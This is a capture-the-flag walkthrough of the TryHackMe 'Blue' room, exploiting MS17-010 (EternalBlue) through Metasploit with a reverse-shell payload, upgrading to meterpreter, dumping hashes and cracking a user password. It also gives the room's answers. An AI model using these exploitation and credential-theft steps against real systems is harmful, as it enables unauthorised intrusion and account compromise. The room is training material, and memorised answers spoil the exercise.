TryHackMe: Blue

This room is based on a windows machine, in which we need to leverage common misconfigurations.

[Task 1] Recon

Start a nmap scan on the given box:

nmap -sV --script vuln -oN nmap/initial <ip>

We find that ports 135, 139, 445, 3389, 49152, 49153, 49154, 49158, 49160 are open.

The vuln scan used above uses an entire category of scripts to test a vulnerable target against.

We can see that smb-vuln-ms17–010 gives use remote code execution vulnerability.

How many ports are open with a port number under 1000?

3

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)

ms17-010

[Task 2] Gain Access

We start Metasploit and search for the vulnerability that we found during our initial recon.

msfconsole
msf6 > search ms17-010

We find the EternalBlue SMB remote exploit.

EternalBlue exploits SMBv1 vulnerabilities to insert malicious data packets and spread malware over the network. The exploit makes use of the way Microsoft Windows handles, or rather mishandles, specially crafted packets from malicious attackers.

We then select the exploit and show options that we need to set.

msf6 > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

We need to set the RHOSTS to our box IP address (in my case I need to set my LHOST to my tun0 IP).

set RHOSTS <ip>
set LHOST <ip>

We set the payload to windows/x64/shell/reverse_tcp as the instructions specified.

set payload windows/x64/shell/reverse_tcp

We then start the exploit.

exploit

To check our current access level, we use whoami and we get:

nt authority\system

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value? (All caps for submission)

RHOSTS

[Task 3] Escalate

Now we background our current shell (Ctrl+Z) and convert our shell to a meterpreter shell.

msf6 > search shell_to_meterpreter
msf6 > use 0

We show options for the current selected exploit. We set LHOST and SESSION.

set LHOST <ip>
set SESSION <session-no.>

We run the exploit and we get a meterpreter session. We then use the meterpreter session instead of the shell.

sessions -i <meterpreter-session-no.>

Now we have a meterpreter session. We check if we are NT AUTHORITY\SYSTEM or not by using getsystem and getuid. We are running as system but that doesn’t indicate that our process is. We need to migrate to another process. Generally we use services.exe.

If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

SESSION

[Task 4] Cracking

We are in an elevated meterpreter shell. We could use the command hashdump and get the password hashes stored on the machine.

meterpreter > hashdump

We copy this hash and crack it using John The Ripper while using rockyou.txt wordlist.

john --format=nt --wordlist=<path-to-wordlist> <hash>

John focuses on LM rather than NTLM hashes by default. Therefore, we need to specify the format as NT.

We get the password for the user Jon.

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon

Copy this password hash to a file and research how to crack it. What is the cracked password?

alqfna22

[Task 5] Find flags!

As we have a meterpreter shell we could search for a file on the system.

We start by changing our directory to C:/ (root of system). We find the flag1.txt in the system root.

We could now directly search for the flags as we know the format of the file.

meterpreter > search -f flag*txt

We have found all the files on the system and and successfully completed the room. The flags represent key locations within the Windows system that we need to know.

flag1? This flag can be found at the system root.

flag{a****************e}

flag2? This flag can be found at the location where passwords are stored within Windows.

flag{s**************************s}

flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

flag{a*****************************e}

TryHackMe profile: https://tryhackme.com/p/kaneki10007